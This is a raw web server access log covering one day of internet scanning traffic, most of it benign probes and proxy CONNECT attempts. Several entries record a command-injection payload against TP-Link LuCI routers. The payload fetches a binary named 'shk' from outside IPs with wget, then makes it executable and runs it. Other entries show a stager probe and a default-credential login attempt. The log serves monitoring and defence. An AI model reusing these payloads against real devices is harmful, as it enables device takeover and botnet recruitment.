51.159.100.248 - - [17/May/2024:02:04:32 +0200] "HEAD / HTTP/1.1" 200 - 51.159.100.248 - - [17/May/2024:02:04:34 +0200] "GET / HTTP/1.1" 200 1895 51.159.100.248 - - [17/May/2024:02:04:37 +0200] "-" 400 1930 45.142.182.70 - - [17/May/2024:02:11:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 87.121.69.25 - - [17/May/2024:02:23:50 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.75.212.75 - - [17/May/2024:02:26:30 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 206.168.32.3 - - [17/May/2024:03:14:34 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [17/May/2024:03:14:38 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [17/May/2024:03:14:38 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.99 - - [17/May/2024:03:54:50 +0200] "-" 400 1930 87.121.69.25 - - [17/May/2024:04:23:00 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 78.108.177.51 - - [17/May/2024:04:51:05 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.52 - - [17/May/2024:05:15:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.130 - - [17/May/2024:05:29:27 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.95.169.184 - - [17/May/2024:05:38:05 +0200] "-" 400 1930 45.95.169.184 - - [17/May/2024:05:38:05 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 87.121.69.25 - - [17/May/2024:06:30:05 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 115.231.78.5 - - [17/May/2024:06:54:23 +0200] "GET / HTTP/1.1" 200 1895 178.32.197.84 - - [17/May/2024:06:58:41 +0200] "GET / HTTP/1.1" 200 1895 213.32.39.44 - - [17/May/2024:07:03:46 +0200] "GET / HTTP/1.1" 200 1895 80.75.212.75 - - [17/May/2024:07:34:12 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.61.44 - - [17/May/2024:07:34:22 +0200] "GET / HTTP/1.1" 200 1895 174.138.61.44 - - [17/May/2024:07:34:22 +0200] "-" 400 1930 87.121.69.25 - - [17/May/2024:08:35:04 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 84.197.0.56 - - [17/May/2024:08:43:41 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [17/May/2024:09:24:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 185.168.173.143 - - [17/May/2024:09:32:02 +0200] "GET / HTTP/1.1" 200 1895 103.237.87.24 - - [17/May/2024:09:42:30 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 93.117.1.99 - - [17/May/2024:10:15:15 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.144 - - [17/May/2024:10:45:13 +0200] "-" 400 1930 198.235.24.144 - - [17/May/2024:10:45:13 +0200] "-" 400 1930 205.210.31.208 - - [17/May/2024:10:56:54 +0200] "GET / HTTP/1.0" 200 1895 165.154.221.175 - - [17/May/2024:11:04:11 +0200] "-" 400 1930 165.154.221.175 - - [17/May/2024:11:04:22 +0200] "GET / HTTP/1.1" 200 1895 165.154.221.175 - - [17/May/2024:11:04:41 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.221.175 - - [17/May/2024:11:04:42 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.221.175 - - [17/May/2024:11:04:42 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 87.121.69.52 - - [17/May/2024:11:12:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.102.56.99 - - [17/May/2024:11:14:38 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [17/May/2024:11:26:51 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 5.196.102.69 - - [17/May/2024:11:27:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.75 - - [17/May/2024:11:30:29 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.75 - - [17/May/2024:11:31:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.71 - - [17/May/2024:11:31:42 +0200] "GET /?format=json HTTP/1.1" 200 1895 216.218.206.79 - - [17/May/2024:11:32:07 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 183.81.169.139 - - [17/May/2024:11:43:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 91.92.245.67 - - [17/May/2024:12:26:22 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [17/May/2024:13:01:09 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.82.77.202 - - [17/May/2024:13:04:06 +0200] "GET / HTTP/1.0" 200 1895 80.82.77.202 - - [17/May/2024:13:16:55 +0200] "-" 400 1930 5.8.11.202 - - [17/May/2024:13:41:23 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [17/May/2024:13:57:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 178.215.236.152 - - [17/May/2024:14:02:16 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 94.156.66.82 - - [17/May/2024:14:32:20 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 198.235.24.86 - - [17/May/2024:14:44:06 +0200] "GET / HTTP/1.1" 200 1895 51.15.117.46 - - [17/May/2024:15:27:33 +0200] "POST /conn_info.php HTTP/1.1" 404 731 103.237.87.24 - - [17/May/2024:15:57:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [17/May/2024:15:59:08 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 149.50.110.239 - - [17/May/2024:16:02:55 +0200] "GET / HTTP/1.1" 200 1895 185.170.144.3 - - [17/May/2024:16:34:16 +0200] "-" 400 1930 87.121.69.25 - - [17/May/2024:16:38:52 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 149.50.110.239 - - [17/May/2024:16:53:58 +0200] "GET / HTTP/1.1" 200 1895 94.156.71.249 - - [17/May/2024:17:03:40 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 194.165.16.10 - - [17/May/2024:17:05:05 +0200] "-" 400 1930 80.76.49.130 - - [17/May/2024:17:08:55 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 87.121.69.52 - - [17/May/2024:17:14:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 167.94.145.96 - - [17/May/2024:18:17:44 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.96 - - [17/May/2024:18:17:49 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.96 - - [17/May/2024:18:17:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 91.92.245.67 - - [17/May/2024:18:20:29 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 103.237.87.24 - - [17/May/2024:18:25:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [17/May/2024:18:51:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 94.156.71.223 - - [17/May/2024:18:52:52 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 87.121.69.25 - - [17/May/2024:19:01:14 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 54.201.201.146 - - [17/May/2024:20:24:39 +0200] "GET / HTTP/1.1" 200 1895 185.180.143.138 - - [17/May/2024:20:30:46 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 737 138.255.149.14 - - [17/May/2024:20:37:06 +0200] "GET / HTTP/1.1" 200 1895 194.169.175.19 - - [17/May/2024:20:41:29 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [17/May/2024:20:51:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 78.108.177.51 - - [17/May/2024:20:51:46 +0200] "GET / HTTP/1.0" 200 1895 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "-" 400 1930 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "-" 400 1930 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "-" 400 1930 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "-" 400 1930 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "-" 400 1930 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "GET / HTTP/1.1" 200 1895 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "POST / HTTP/1.1" 200 1895 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "POST / HTTP/1.1" 200 1895 185.91.69.110 - - [17/May/2024:20:54:29 +0200] "GET /WuEL HTTP/1.1" 404 722 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "GET stager64 HTTP/1.1" 400 804 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "GET /a HTTP/1.1" 404 719 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "GET /download/file.ext HTTP/1.1" 404 739 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "GET /SiteLoader HTTP/1.1" 404 728 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "GET /mPlayer HTTP/1.1" 404 725 185.91.69.110 - - [17/May/2024:20:54:30 +0200] "POST / HTTP/1.1" 200 1895 211.57.200.14 - - [17/May/2024:20:58:38 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [17/May/2024:21:06:12 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 206.168.32.3 - - [17/May/2024:21:33:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [17/May/2024:21:33:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [17/May/2024:21:33:22 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.52 - - [17/May/2024:23:01:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 116.74.17.235 - - [17/May/2024:23:06:41 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 749 183.81.169.139 - - [17/May/2024:23:16:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.15.222.150%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 192.241.223.55 - - [17/May/2024:23:30:12 +0200] "GET / HTTP/1.1" 200 1895